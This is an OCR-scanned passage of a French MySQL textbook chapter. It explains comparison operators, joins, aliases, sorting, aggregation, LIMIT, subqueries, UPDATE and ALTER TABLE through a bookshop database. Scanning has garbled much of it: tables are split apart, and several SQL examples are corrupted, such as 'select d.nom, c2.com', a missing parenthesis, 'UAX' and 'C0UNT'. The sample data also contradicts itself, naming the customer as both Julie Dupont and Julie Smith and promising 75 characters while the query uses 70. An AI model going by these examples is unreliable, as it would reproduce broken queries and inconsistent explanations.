Nom (si possible) 


Exemple 


Description 




Egalite 


idclient = 3 


Teste si deux valeurs sont egales. 


> 


Superieur 


montant > 60.00 


Teste si une valeur est superieure a 
une autre. 


< 


Inferieur 


montant < 60.00 


Teste si une valeur est inferieure a 
une autre. 
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Tableau 10.1 : Les operateurs de comparaison utiles dans les clauses WHERE (suite) 



Operateur Nom (si possible) Exemple 

>= Superieur ou egal montant >= 60.00 

<= Inferieur ou egal montant <= 60.00 



! = ou <> Different de 



quantite != 



IS NOT NULL adresse is not null 

IS NULL adresse is null 

BETWEEN montant between 

and 60.00 

IN ville in ("Carlton", 

"Moe") 

NOT IN ville not in 

("Carlton", "Moe") 

LIKE Concordance de motif nom like ("Fred %") 

NOT LIKE Concordance de motif nom not like 

("Fred %") 

REGEXP Expression reguliere nom regexp 



Description 

Teste si une valeur est superieure 
ou egale a une autre. 

Teste si une valeur est inferieure 
ou egale a une autre. 

Teste si deux valeurs sont 
differentes. 

Teste si un champ contient une 
valeur. 

Teste si un champ ne contient 
aucune valeur. 

Teste si une valeur se trouve dans 
un intervalle specifie. 

Teste si une valeur se trouve dans 
un ensemble specifie. 

Teste si une valeur ne se trouve 
pas dans un ensemble specifie. 

Teste si une valeur correspond a 
un motif specifie. 

Teste si une valeur ne correspond 
pas a un motif specifie. 

Teste si une valeur correspond a 
une expression reguliere. 



Les trois dernieres lignes de ce tableau font reference a LIKE et a REGEXP, qui effectuent 
des comparaisons de motifs. 

LIKE utilise la concordance de motif de SQL. Les motifs peuvent contenir du texte classi- 
que, plus les caracteres % et . Le caractere % sert de joker pour indiquer une correspon- 
dance sur un nombre quelconque (eventuellement nul) de caracteres, et correspond a 
n'importe quel caractere unique. 

Le mot-cle REGEXP est utilise pour les recherches de correspondances realisees avec 
des expressions regulieres. MySQL utilise les expressions regulieres POSIX. Vous 
pouvez aussi vous servir de RLIKE a la place de REGEXP, car ce sont deux synonymes. 
Les expressions regulieres POSIX sont celles que nous avons presentees au Chapi- 
tre 4). 
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Vous pouvez tester plusieurs criteres en les associant avec AND et OR. Par exemple : 

select * 
from clients 

where idclient = 3 or idclient = 4; 

Recuperer des donnees dans plusieurs tables 

Pour repondre a une question posee a la base de donnees, il faut souvent recuperer des 
donnees dans plusieurs tables. Si, par exemple, vous souhaitez connaitre les clients qui 
ont passe des commandes au cours du mois courant, vous devez examiner la table 
clients et la table commandes. En outre, si vous souhaitez savoir precisement ce qu'ils 
ont commande, vous devez egalement examiner la table livres commandes. 

Ces elements se trouvent dans differentes tables puisqu'ils correspondent a des objets 
reels differents. C'est l'un des principes de conception que nous avons vus au Chapitre 8. 

Pour rassembler ces informations avec SQL, vous devez effectuer une operation appe- 
lee jointure. Cette operation revient simplement a reunir plusieurs tables en fonction 
des relations qui existent entre leurs donnees. Par exemple, si nous souhaitons afficher 
les commandes effectuees par Julie Dupont, nous devons commencer par rechercher 
1' idclient de Julie dans la table clients, puis rechercher les commandes correspondant a 
cet idclient dans la table commandes. 

Bien que les operations de jointure soient conceptuellement assez simples, il s'agit en 
fait d'une des parties les plus subtiles et les plus complexes de SQL. MySQL imple- 
mente plusieurs types de jointures, adaptes a differentes situations. 

Jointure simple de deux tables 

Commencons par etudier le code SQL pour la requete dont nous venons de parler, a 
propos de Julie Dupont : 

select commandes . idcommande , commandes .montant , commandes . date 

from clients, commande 

where clients. nom = 'Julie Dupont' 

and clients . idclient = commandes . idclient ; 

Le resultat de cette requete est le suivant : 

| idcommande | montant | date | 

1 | 69.99 | 2007-04-02 | 
4 | 24.99 | 2007-05-01 | 

Nous pouvons remarquer plusieurs choses interessantes. 

Tout d'abord, comme il faut reunir les informations des deux tables pour repondre a 
cette requete, nous avons indique ces deux tables dans la requete. 



Chapitre 10 



Travailler avec une base de donnees MySQL 265 



Ce faisant, nous avons precise un type de jointure sans le savoir. En effet, la virgule qui 
separe les noms des tables est equivalente a INNER JOIN ou a CROSS JOIN. II s'agit d'un 
type de jointure parfois appele jointure complete ou produit cartesien de deux tables. 
Ce type de jointure signifie litteralement : "A partir des tables indiquees, creer une seule 
grande table qui doit contenir une ligne pour chaque combinaison possible des 
lignes de ces tables, que cela ait un sens ou non." En d'autres termes, nous obtenons 
une table contenant toutes les lignes de la table clients associees a toutes les lignes de 
la table commandes, quelles que soient les commandes effectuees par les clients. 

Cette operation brutale n'a pas beaucoup de sens dans la plupart des cas. En effet, on 
souhaite le plus souvent ne retenir que les lignes qui ont un sens, c'est-a-dire ici les 
commandes passees par un client qui correspondent a ce client. 

Pour obtenir ce resultat, il suffit d'ajouter une condition de jointure dans la clause 
WHERE. Ce type d'instruction conditionnelle speciale exprime la relation qui doit exister 
entre les deux tables. Ici, notre condition de jointure est la suivante : 

clients . idclient = commandes . idclient 
Elle demande a MySQL de ne placer dans la table finale que les lignes dont le idclient 
de la table clients correspond au idclient de la table commandes. 

En ajoutant cette condition de jointure a notre requete, nous avons cree un autre type de 
jointure, appele equi-jointure. 

Vous avez egalement remarque la notation avec le point, qui permet de preciser sans 
ambiguite la table dont proviennent les colonnes : clients . idclient fait reference a la 
colonne idclient de la table clients et commandes . idclient fait reference a la colonne 
idclient de la table commandes. 

Cette notation est necessaire lorsque le nom d'une colonne est ambigu, c'est-a-dire s'il 
apparait dans plusieurs tables. 

En outre, cette notation pointee peut egalement etre utilisee pour lever les ambiguites 
sur des noms de colonnes de bases de donnees differentes. Dans cet exemple, nous nous 
sommes servis de la notation table . colonne, mais il est egalement possible d'y ajouter 
le nom d'une base de donnees (base de donnees. table. colonne), par exemple pour 
tester une condition comme celle-ci : 

livres . commandes . idclient = autre_bd . commandes . idclient 

Enfm, vous pouvez vous servir de cette notation pour toutes les references de colonnes dans 
une requete. C'est generalement conseille, surtout lorsque vos requetes deviennent un peu 
plus complexes car, meme si ce n'est pas impose par MySQL, cela facilite beaucoup la lisi- 
bilite et la maintenance des requetes. Vous remarquerez d'ailleurs que nous avons respecte 
cette convention dans le reste de la requete precedente, par exemple dans la condition : 

clients. nom = 'Julie Dupont' 
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La colonne nom n'existant que dans la table clients, nous n'avions pas reellement 
besoin de preciser la table dont elle provient. Pour les utilisateurs qui relisent le code, 
en revanche, la reference nom seule reste vague et elle devient plus claire sous la forme 
clients . nom. 

Jointures de plus de deux tables 

Cette operation n'est pas plus complexe que la jointure de deux tables. D'une maniere 
generale, les tables doivent etre jointes deux a deux avec des conditions de jointure. 
Vous pouvez considerer que cela revient a respecter les relations qui existent entre les 
donnees des tables. 

Par exemple, si nous souhaitons connaitre les clients qui ont commande des livres sur 
Java (eventuellement pour pouvoir leur envoyer des informations sur un nouveau livre 
sur ce langage), nous devons suivre ces relations dans plusieurs tables. 

Nous devons commencer par reperer les clients qui ont passe au moins une commande 
contenant un Livres Commandes correspondant a un livre sur Java. Pour passer de la table 
clients a la table commandes, nous pouvons nous servir de la colonne idclient, comme 
nous l'avons deja fait. Pour passer de la table commandes a la table Livres Commandes, 
nous pouvons utiliser idcommande. Pour obtenir dans la table Livres Commandes un livre 
specifique de la table livres, nous pouvons nous servir du numero ISBN. Apres avoir 
etabli toutes ces relations, nous pouvons chercher les livres dont le titre contient "Java" et 
renvoyer les noms des clients qui ont achete l'un de ces livres. 

Voyons maintenant le code de cette requete : 
select clients. nom 

from clients, commandes, livres_commandes , livres 

where clients. idclient = commandes . idclient 

and commandes . idcommande = livres_commandes. idcommande 

and livres_commandes . isbn = livres. isbn 

and livres. titre like '%Java%' ; 

Cette requete renvoie le resultat suivant : 

+ + 

| nom | 

+ + 

| Julie Dupont | 

+ + 

Vous remarquerez que nous avons suivi les donnees dans quatre tables differentes. Pour 
faire cela avec une equi-jointure, nous avons besoin de trois conditions de jointure 
differentes. Comme il faut generalement une condition de jointure pour chaque paire de 
tables que vous souhaitez reunir, il y a au total une jointure de moins que le nombre 
de tables a joindre. Cette regie est assez utile pour deboguer les requetes qui ne fonc- 
tionnent pas. Verifiez vos conditions de jointure et assurez-vous que vous respectez 
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bien les enchainements necessaries pour obtenir ce que vous vouliez a partir des infor- 
mations que vous avez donnees. 

Trouver les lignes qui ne correspondent pas 

L' autre type de jointure principal dont vous aurez besoin est la jointure a gauche. 

Dans les exemples precedents, seules les lignes verifiant les conditions dans toutes les 
tables etaient retenues. II arrive cependant que Ton ait besoin des lignes qui ne corres- 
pondent pas a ces conditions, par exemple pour rechercher les clients qui n'ont passe 
aucune commande ou les livres qui n'ont jamais ete achetes. 

La methode la plus simple pour repondre a ce type de question avec MySQL consiste a 
utiliser une jointure a gauche. Ce type de jointure renvoie en effet les lignes qui satis- 
font la condition de jointure entre deux tables. S'il n'y a aucune ligne correspondante 
dans la table de droite, une ligne est ajoutee dans la table des resultats, contenant des 
valeurs NULL dans les colonnes de droite. 

Prenons un exemple : 

select clients . idclient , clients. nom, commandes.idcommande 

from clients left join commandes 

on clients . idclient = commandes . idclient ; 

Cette requete SQL se sert d'une jointure a gauche pour regrouper les tables clients et 
commandes. Vous remarquerez que la jointure a gauche utilise une syntaxe legerement 
differente pour sa condition de jointure : elle se trouve ici dans une clause ON speciale 
de 1' instruction SQL. 

Voici le resultat de cette requete : 



+ + + + 

| idclient | nom | idcommande | 

+ + + + 

| 3 | Julie Smith | 1 | 

j 3 | Julie Smith | 4 | 

j 4 | Alain Wong j NULL j 

j 5 | Michelle Arthur j 1 j 

+ + + + 



Ce resultat ne montre que les clients qui ont des idclient non NULL. 

Si vous ne voulez connaitre que les clients qui n'ont passe aucune commande, il suffit de 
rechercher ces valeurs NULL dans la cle primaire de la table correspondante (idcommande, 
ici), puisque ce champ ne devrait etre NULL dans aucune des lignes : 

select clients . idclient , clients. nom 
from clients left join commandes 
using (idclient) 

where commandes.idcommande is null; 
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Voici le resultat obtenu : 

+ + + 

| idclient | nom | 

+ + + 

| 4 | Alain Wong | 

5 I Michelle Arthur | 

+ + + 

Vous remarquerez que nous nous sommes egalement servis d'une syntaxe differente 
pour la condition de jointure de cet exemple. Les jointures a gauche acceptent en effet 
soit la syntaxe ON que nous avons utilisee dans le premier exemple, soit la syntaxe USING 
du second exemple. La syntaxe USING ne precisant pas la table d'ou provient l'attribut 
de jointure, les colonnes des deux tables doivent porter le meme nom lorsque vous 
voulez utiliser cette clause. 

Vous pouvez egalement repondre a ce type de question en utilisant des sous-requetes, 
que nous presenterons plus loin dans ce chapitre. 

Utiliser d'autres noms pour les tables : les alias 

II est souvent pratique, et parfois indispensable, de pouvoir faire reference aux tables 
avec d'autres noms, que Ton appelle des alias. Vous pouvez les creer au debut d'une 
requete et les utiliser dans tout le reste de cette requete. lis servent souvent de raccour- 
cis pour les noms des tables, comme dans cet exemple qui n'est qu'une reecriture d'une 
requete que nous avons deja presentee : 

select cli.nom 

from clients as cli, commandes as cde, livres_commandes as lc, 

livres as 1 
where cli. idclient = cde. idclient 
and cde . idcommande = lc . idcommande 
and lc.isbn = l.isbn 
and l.titre like '%Java%'; 

Lorsque nous declarons les tables que nous allons utiliser, nous ajoutons une clause 
AS pour declarer l'alias d'une table. II est egalement possible de defmir des alias 
pour des colonnes, mais nous y reviendrons lorsque nous verrons les fonctions 
d'agregation. 

II faut passer par les alias pour realiser une jointure d'une table avec elle-meme. Cela a 
l'air plus difficile et plus etrange que cela ne Test en realite. Cette approche peut etre 
utile, si, par exemple, nous voulons trouver dans une table les lignes qui possedent des 
valeurs en commun. Ainsi, pour trouver les clients qui habitent dans la meme ville 
(eventuellement pour diffuser des publicites), nous pouvons affecter deux alias a la 
meme table (clients) : 

select d.nom, c2.com, c1. ville 
from clients as c1 , clients as c2 
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where c1. ville = c2.ville 
and c1 .nom != c2.nom; 

Dans cette requete, nous faisons comme si la table clients representait en fait deux 
tables differentes, c1 et c2, et nous effectuons une jointure sur la colonne ville. Vous 
remarquerez que nous avons egalement besoin de la deuxieme condition, c1 .nom ! = 
c2 . nom, pour eviter que chaque client ne verifie la condition (puisque chaque client 
habite evidemment dans la meme ville que lui). 



Recapitulatif sur les jointures 

Les differents types de jointures sont presentes dans le Tableau 10.2. II en existe 
d'autres, mais ce tableau rassemble celles que vous utiliserez le plus souvent. 



Tableau 10.2 : Les types de jointures dans MySQL 



Nom 

Produit cartesien 

Jointure complete 
Jointure croisee 

Jointure interne 



Equi-jointure 
Jointure a gauche 



Description 

Toutes les combinaisons de toutes les lignes des tables de la jointure. 
Ce type de jointure est choisi en placant une virgule entre les noms des 
tables et en ne specifiant aucune clause WHERE. 

Comme ci-dessus. 

Comme ci-dessus. Peut egalement etre utilisee en utilisant la clause 
CROSS JOIN entre les noms des tables de la jointure. 

Semantiquement equivalente a la virgule. Elle peut egalement etre 
indiquee al'aide de la clause INNER JOIN. Sans condition WHERE, elle est 
equivalente a produit cartesien. Generalement, on utilise egalement une 
condition WHERE pour en faire une veritable jointure interne. 

Utilise un test d'egalite pour associer les lignes des differentes tables de 
la jointure. En SQL, c'est une jointure avec une clause WHERE. 

Tente d' associer des lignes provenant des tables indiquees et remplit les 
lignes ne correspondant pas avec la valeur NULL. Utilisee dans SQL 
avec les clauses LEFT JOIN. Elle permet de trouver des valeurs 
manquantes. Vous pouvez utiliser de la meme maniere RIGHT JOIN pour 
faire une jointure a droite. 



Recuperer les donnees dans un ordre particulier 

Si vous souhaitez afficher les lignes renvoyees par une requete dans un ordre particulier, 
vous pouvez vous servir de la clause ORDER BY de l'instruction SELECT. Celle-ci permet 
de presenter la sortie obtenue dans un format plus lisible. 
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La clause ORDER BY trie les lignes d'une ou de plusieurs colonnes de la clause SELECT. 
Par exemple : 

select nom, adresse 
from clients 
order by nom; 

Cette requete renvoie les noms et les adresses des clients, en les triant par ordre alphabe- 
tique des noms : 



nom 


| adresse 

_ + 


Alain Wong 


| 147 Avenue Haines 


Julie Dupont 


| 25 rue noire 


Melissa Jones 




Michel Archer 


| 12 Avenue plate 


Michelle Arthur 


| 357 rue de Paris 




.4- 



Vous remarquerez que, dans ce cas, les noms etant au format prenom nom de famille, ils 
sont tries en fait d'apres le prenom. Si vous souhaitez les trier d'apres le nom de famille, il 
faut separer les prenoms et les noms de famille, et les mettre dans deux champs differents. 

Par defaut, l'ordre de tri est croissant. Vous pouvez le preciser explicitement a l'aide du 
mot-cle ASC : 

select nom, adresse 
from clients 
order by nom asc; 

Mais il est egalement possible de trier par ordre decroissant, en specifiant le mot-cle DESC : 

select nom, adresse 
from clients 
order by nom desc; 

Vous pouvez aussi trier sur plusieurs colonnes, ou vous servir des alias des colonnes, ou 
meme de leur position dans la table (par exemple, 3 correspond a la troisieme colonne 
de la table) au lieu de leur nom. 



Groupement et agregation des donnees 

II faut souvent determiner le nombre de lignes qui appartiennent a un ensemble particu- 
lier ou la valeur moyenne d'une colonne (par exemple le montant moyen des comman- 
des). MySQL possede plusieurs fonctions d' agregation qui se revelent tres utiles pour 
repondre a ce type de requete. 

Ces fonctions d' agregation peuvent etre appliquees a une table prise comme un ensemble 
ou a un groupe de donnees dans une table. 



Chapitre 10 



Travailler avec une base de donnees MySQL 271 



Les fonctions d'agregation les plus utilisees sont presentees dans le Tableau 10.3. 



Tableau 10.3 : Les fonctions d'agregation de MySQL 



Nom 


Description 


AVG {colonne) 


Moyenne des valeurs de la colonne indiquee. 


COUNT (element) 


Si vous indiquez une colonne, cette fonction renvoie le nombre de 




valeurs non NULL de cette colonne. Si vous ajoutez le mot DISTINCT 




devant le nom de la colonne, vous obtiendrez le nombre de valeurs 




distinctes dans cette colonne uniquement. Si vous utilisez C0UNT(*), 




vous obtiendrez un compte global, independamment des valeurs 




NULL. 


MIN (colonne) 


Plus petite valeur de la colonne indiquee. 


UAX(colonne) 


Plus grande valeur de la colonne indiquee. 


STD (colonne) 


Ecart-type des valeurs de la colonne indiquee. 


STDDEV (colonne) 


Identique a STD ( colonne ) . 


SUM (colonne) 


Somme des valeurs de la colonne indiquee. 



Voyons maintenant quelques exemples, en commencant par celui que nous avons 
mentionne plus haut. Nous pouvons calculer la moyenne des commandes comme ceci : 

select avg(montant) 
from commandes; 

Ce qui fournit la sortie suivante : 

+ + 

| avg(montant) | 
+ + 

| 54.985002 | 

+ + 

Pour obtenir des informations plus detaillees, nous pouvons nous servir de la clause 
GROUP BY. Celle-ci va nous permettre, par exemple, d'afficher la moyenne des comman- 
des de chaque client. Grace a ce mecanisme, nous pouvons connaitre le client qui a 
depense le plus d' argent : 

select idclient, avg(montant) 
from commandes 
group by idclient; 

Lorsque vous utilisez la clause GROUP BY avec une fonction d'agregation, cette clause 
modifie le comportement de la fonction. Au lieu de fournir la moyenne des montants 
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des commandes de toute la table, cette requete fournit la moyenne des montants des 
commandes pour chaque client (ou, plus precisement, pour chaque idclient) : 

+ + + 

| idclient | avg(montant) | 

+ + + 

| 1 | 49.990002 | 

2 | 74.980003 | 
j 3 | 47.485002 | 

+ + + 

En SQL ANSI, si vous utilisez une clause GROUP BY, les seuls elements qui peuvent 
apparaitre dans la clause SELECT sont les fonctions d'agregation et les colonnes indi- 
quees dans la clause GROUP BY. En outre, si vous voulez utiliser une colonne dans une 
clause GROUP BY, celle-ci doit apparaitre dans la clause SELECT. 

MySQL accorde en fait un peu plus de liberte. II accepte une syntaxe etendue qui permet 
de ne pas specifier des elements dans la clause SELECT si vous ne souhaitez pas les y mettre. 

Nous pouvons egalement tester le resultat d'une agregation a l'aide d'une clause HAVING. 
Celle-ci doit etre indiquee immediatement apres la clause GROUP BY et elle fonctionne 
comme une clause WHERE qui ne s'appliquerait qu'aux groupes et aux agregats. 

Pour poursuivre notre exemple precedent, nous pouvons nous servir de la requete 
suivante pour connaitre les clients dont la moyenne des commandes est superieure a 
50 euros : 

select idclient, avg(montant) 

from commandes 

group by idclient 

having avg(montant) > 50; 

La clause HAVING s'applique aux groupes. Cette requete renvoie done le resultat suivant : 

+ + + 

| idclient | avg(montant) | 

+ + + 

| 2 | 74.980003 | 

+ + + 

Choisir les lignes a renvoyer 

La clause LIMIT de l'instruction SELECT peut etre particulierement utile dans les applica- 
tions web. Elle permet d'indiquer les lignes du resultat qui seront renvoyees. Cette clause 
prend deux parametres : le numero de ligne de depart et le nombre de lignes a renvoyer. 

La requete suivante met en ceuvre la clause LIMIT : 

select nom 
from clients 
limit 2, 3; 
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Cette requete peut etre interpretee comme : "Selectionne les noms des clients et renvoie 
3 lignes a partir de la deuxieme ligne du resultat." Vous remarquerez que les lignes sont 
numerotees a partir de 0, c'est-a-dire que la premiere ligne du resultat est la ligne 0. 

Ceci est tres utile pour les applications web, car on peut ainsi n'afficher, par exemple, 
que 10 articles par page lorsque Ton presente un catalogue aux clients. 

Notez cependant que LIMIT ne fait pas partie du standard ANSI SQL. II s'agit d'une 
extension MySQL : en l'utilisant, vous rendez votre code SQL incompatible avec la 
plupart des autres SGBDR. 

Utiliser des sous-requetes 

Une sous-requete est une requete imbriquee dans une autre requete. Si la plupart des fonc- 
tionnalites des sous-requetes peuvent etre obtenues en utilisant attentivement des jointures 
et des tables temporaires, les sous-requetes sont generalement plus simples a lire et a 
ecrire. 

Sous-requetes elementaires 

L usage le plus courant des sous-requetes consiste a utiliser le resultat d'une requete 
dans une comparaison d'une autre requete. Vous pouvez, par exemple, utiliser la requete 
suivante pour retrouver la plus grosse commande : 

select idclient, montant 
from commandes 

where montant = (select max(montant) from commandes); 
Cette requete donne le resultat suivant : 

+ + + 

| idclient | montant | 

+ + + 

| 2 | 74.98 | 

+ + + 

Dans ce cas, la sous-requete renvoie une seule valeur (le montant maximal) qui est utili- 
sed ensuite pour la comparaison dans la requete externe. II s'agit d'un bon exemple 
d'usage de sous-requete, car cette requete particuliere ne peut pas etre reproduite de 
maniere elegante en utilisant des jointures en ANSI SQL. 

Vous obtiendrez toutefois le meme resultat avec la jointure suivante : 

select idclient, montant 
from commandes 
order by montant desc 
limit 1 ; 

Mais, parce qu'elle s'appuie sur LIMIT, cette requete n'est pas compatible avec la plupart 
des SGBDR. Cependant, elle s'executera plus efficacement sur MySQL que la version 
avec une sous-requete. 
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L'une des principales raisons pour lesquelles MySQL a tant tarde a proposer des sous- 
requetes tient au nombre tres reduit d'operations qu'elles vous permettent de realiser. 
Techniquement, vous pouvez creer une seule requete ANSI SQL ay ant le meme effet, 
mais qui s'appuie sur un hack inefficace appele MAX-CONCAT. 

Vous pouvez utiliser des valeurs de sous-requete de cette maniere avec tous les opera- 
teurs de comparaison classiques et il existe egalement certains operateurs de comparai- 
son specifiques aux sous-requetes que nous decrirons dans la section suivante. 

Sous-requetes et operateurs 

II existe cinq operateurs specifiques aux sous-requetes. Quatre d'entre eux sont utilises 
avec les sous-requetes standard et un (EXISTS) n'est generalement utilise qu'avec des 
sous-requetes correlees. Nous en traiterons dans la prochaine section. Les quatre opera- 
teurs de sous-requete standard sont presentes dans le Tableau 10.4. 

Tableau 10.4 : Operateurs de sous-requete 



Nom Syntaxe d'exemple Description 



ANY 


SELECT 


C1 


FROM 


t1 


WHERE 


C1 


> ANY (SELECT c1 FROM t2) ; 


Renvoie true si la 


















comparaison est vraie 


















pour l'une des lignes 


















de la sous-requete. 


IN 


SELECT 


d 


FROM 


t1 


WHERE 


d 


IN SELECT d from t2) ; 


Equivalent de =ANY. 


SOME 


SELECT 


C1 


FROM 


t1 


WHERE 


d 


> SOME (SELECT d FROM t2) ; 


Alias de ANY. 


ALL 


SELECT 


C1 


FROM 


t1 


WHERE 


C1 


> ALL (SELECT d from t_2) ; 


Renvoie true si la 


















comparaison est vraie 


















pour toutes les lignes 


















de la sous-requete. 



Chacun de ces operateurs ne peut apparaitre qu'apres un operateur de comparaison, a 
l'exception de IN, ou l'operateur de comparaison (=) est en quelque sorte "integre". 

Sous-requetes correlees 

Dans les sous-requetes correlees, les choses se compliquent un peu, car vous pouvez 
utiliser des elements de la requete externe dans la requete interne. Par exemple : 

select isbn, titre 
from livres 
where not exists 
(select * 

from livres_commandes 

where livres_commandes.isbn = livres. isbn) ; 
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Cette requete illustre l'utilisation des sous-requetes correlees et du dernier operateur de 
sous-requete specifique, EXISTS. Elle recupere tous les livres qui n'ont jamais ete 
commandes (ces informations sont identiques a celles retrouvees precedemment a 
l'aide d'une jointure a gauche). Notez que la clause FROM de requete interne n'inclut que 
la table livres commandes mais que cette sous-requete fait egalement reference a 
livres. isbn. En d'autres termes, la requete interne fait reference aux donnees de la 
requete externe, ce qui est la definition meme d'une sous-requete correlee. Vous recher- 
chez en fait les lignes internes qui correspondent (ou, dans le cas present, ne correspondent 
pas) aux lignes externes. 

L' operateur EXISTS renvoie true s'il existe des lignes correspondantes dans la sous- 
requete. Inversement, NOT EXISTS renvoie true s'il n'existe pas de ligne correspondante 
dans la sous-requete. 

Sous-requetes de ligne 

Toutes les sous-requetes que nous avons etudiees jusqu'a present retournaient une seule 
valeur, correspondant generalement a true ou a false (comme dans l'exemple prece- 
dent avec EXISTS). Les sous-requetes de ligne renvoient une ligne entiere, qui peut 
ensuite etre comparee a des lignes entieres dans la requete externe. Cette methode est 
generalement adoptee pour rechercher des lignes dans une table qui existent egalement 
dans une autre table. Aucun exemple interessant ne peut etre trouve dans la base de 
donnees livres, mais on peut fournir un exemple d'utilisation de la syntaxe de la 
maniere suivante : 

select c1 , c2, c3 
from t1 

where (cl, c2, c3) in (select c1 , c2, c3 from t2); 
Utiliser une sous-requete comme table temporaire 

Vous pouvez utiliser une sous-requete dans la clause FROM d'une requete externe. Cette 
approche vous permet d'interroger le resultat de la sous-requete en la traitant comme 
une table temporaire. 

Sous sa forme la plus simple, ce type de sous-requete se presente comme suit : 
select * from 

(select idclient, nom from clients where ville = 'Bordeaux') 
as clients_bordeaux; 

Notez qu'ici nous placons la sous-requete dans la clause FROM. Juste apres la parenthese 
fermante de la sous-requete, vous devez donner le resultat de la sous-requete sous 
forme d'alias que vous pourrez ensuite traiter comme n'importe quelle autre table dans 
la requete externe. 
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Mise a jour des enregistrements de la base de donnees 

Outre la recuperation des donnees dans la base de donnees, une autre operation classi- 
que consiste a les modifier. Par exemple, nous pouvons avoir besoin d'augmenter le 
prix des livres dans la base de donnees. Pour cela, il existe l'instruction UPDATE. 

La syntaxe de UPDATE est la suivante : 

UPDATE [LOW_PRIORITY] [IGNORE] nom_table 

SET colonne1=expression1 ,colonne2-expression2, . . . 

[WHERE condition] 

[ORDER BY criteres_tri] 

[LIMIT nombre] 

Cette instruction met a jour la table nom table en modifiant toutes les colonnes indi- 
quees avec les expressions fournies. Vous pouvez restreindre une instruction UPDATE a 
certaines lignes avec une clause WHERE et limiter le nombre total de lignes affectees avec 
une clause LIMIT. ORDER BY n'est generalement utilise qu'en conjonction avec une 
clause LIMIT ; par exemple, si vous devez ne mettre a jour que les dix premieres lignes, 
vous devez prealablement les placer dans un ordre particulier. Si les clauses 
LOW PRIORITY et IGNORE sont utilisees, elles fonctionnent de la meme maniere que dans 
une instruction INSERT. 

Passons maintenant a quelques exemples. 

Si nous souhaitons augmenter tous les prix de 10 %, nous pouvons utiliser une instruction 
UPDATE sans clause WHERE : 

update livres 

set prix = prix * 1.1; 

Si, en revanche, nous ne souhaitons modifier qu'une seule ligne (par exemple pour 
changer l'adresse d'un client), nous pouvons nous servir de la requete suivante : 

update clients 

set adresse = '250 rue Olsens' 
where idclient = 4; 

Modification des tables apres leur creation 

Non seulement nous pouvons modifier le contenu d'une table, mais nous pouvons 
egalement modifier sa structure. Pour cela, on utilise l'instruction ALTER TABLE, dont la 
syntaxe est la suivante : 

ALTER TABLE [IGNORE] nom_table modification [, modification ...] 

En SQL ANSI, il n'est possible d'apporter qu'une seule modification par instruction 
ALTER TABLE mais, avec MySQLn vous pouvez en faire autant que vous le souhaitez. 
Chaque clause de modification peut servir a modifier differents aspects de la table. 
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Si la clause IGNORE est utilisee et que vous essayiez d'effectuer une modification qui 
duplique des cles primaires, la premiere ira dans la table modifiee et les autres seront 
supprimees. Si cette clause n'est pas indiquee (par defaut), la modification echouera et 
sera annulee. Les differents types de modifications que vous pouvez apporter avec cette 
instruction sont presentes dans le Tableau 10.5. 



Tableau 10.5 : Les modifications possibles avec I'instruction ALTER TABLE 



Syntaxe 

ADD [COLUMN] description colonne 
[FIRST | AFTER colonne ] 



ADD [COLUMN] {description colonne, 
description colonne, . . . ) 

ADD INDEX [index] (colonne,...) 



ADD [CONSTRAINT [symbole]] PRIMARY 
KEY (colonne , . . . ) 



ADD UNIQUE [CONSTRAINT [symbole]] 
[index] (colonne, . . . ) 



ADD [CONSTRAINT] [symbole]] FOREIGN 
KEY [index] (index col, ...) 
[definition reference] 

ALTER [COLUMN] colonne {SET DEFAULT 
valeur | DROP DEFAULT} 

CHANGE [COLUMN] colonne 
description nlle colonne 



MODIFY [COLUMN] description colonne 



DROP [COLUMN] colonne 



Description 

Ajoute une nouvelle colonne a 1' emplacement 
indique (s'il n'est pas indique, la colonne est 
ajoutee a la fin). Notez que description colonne 
necessite un nom et un type, tout comme une 
instruction CREATE. 

Ajoute une ou plusieurs colonnes a la fin de la table. 

Ajoute un index dans la table, sur les colonnes 
indiquees. 

Transforme les colonnes indiquees en cle primaire 
de la table. La notation CONSTRAINT ne concerne 
que les tables utilisant des cles etrangeres. Pour 
plus d' informations a ce sujet, consultez le 
Chapitre 13. 

Ajoute un index unique dans la table, sur les 
colonnes indiquees. La notation CONSTRAINT ne 
concerne que les tables InnoDB utilisant des cles 
etrangeres. Pour plus d'informations a ce sujet, 
consultez le Chapitre 13. 

Ajoute une cle etrangere a une table InnoDB. 



Ajoute ou supprime une valeur par defaut pour une 
colonne particuliere. 

Modifie la colonne indiquee en lui affectant la 
nouvelle description. Vous pouvez vous en servir 
pour modifier le nom d'une colonne, puisque la 
description d'une colonne contient son nom. 

Comme CHANGE. Permet de modifier le type d'une 
colonne, pas son nom. 

Supprime la colonne indiquee. 
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Tableau 10.5 : Les modifications possibles avec I'instruction ALTER TABLE (suite) 



Syntaxe 

DROP PRIMARY KEY 
DROP INDEX index 
DROP FOREIGN KEY cle 
DISABLE KEYS 
ENABLE KEYS 

RENAME [AS] nom nlle table 
ORDER BY nom col 



Description 

Supprime l'index principal (mais pas la colonne). 

Supprime l'index indique. 

Supprime la cle etrangere (mais pas la colonne). 

Desactive la mise a jour de l'index. 

Active la mise a jour de l'index. 

Renomme une table. 

Recree la table avec les lignes dans un ordre 
particulier (notez qu'apres avoir modine la table les 
lignes ne seront plus dans 1' ordre). 



CONVERT TO CHARACTER SET jdc COLLATE Convertit toutes les colonnes texte avec le jeu de 
ode caracteres et l'ordre de classement indiques. 

[DEFAULT] CHARACTER SET cs COLLATE c Definit lejeu de caracteres et l'ordre de classement 

par defaut. 



DISCARD TABLESPACE 



IMPORT TABLESPACE 



options table 



Supprime le fichier d'espace de tables sous-jacent 
pour une table InnoDB (pour plus d' informations 
sur les tables InnoDB, voir le Chapitre 13). 

Recree le fichier d'espace de tables sous-jacent 
pour une table InnoDB (pour plus d' informations 
sur les tables InnoDB, voir le Chapitre 13). 

Permet de reinitialiser les options de table. Utilise 
la meme syntaxe que CREATE TABLE. 



Voyons maintenant quelques utilisations courantes de ALTER TABLE. 

II arrive assez souvent que Ton se rende compte qu'une colonne n'est pas assez grande 
pour les donnees qu'elle contient. Par exemple, dans notre table clients, nous avons 
choisi des noms de 50 caracteres au maximum. Apres avoir ajoute quelques donnees, il 
se peut que nous nous rendions compte que certains noms font plus de 50 caracteres et 
qu'ils sont tronques. Pour corriger ce probleme, il suffit de modifier le type de la 
colonne et de choisir une largeur de 75 caracteres : 

alter table clients 

modify nom char(70) not null; 

II arrive aussi que Ton ait besoin d'ajouter une colonne. Imaginons par exemple qu'une 
taxe sur les livres soit ajoutee et que Book-O-Rama ait besoin d'ajouter le montant de 
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cette taxe au total des commandes. Nous pouvons ajouter une colonne taxe dans la 
table commandes, comme ceci : 

alter table commandes 

add taxe float(6,2) after montant; 

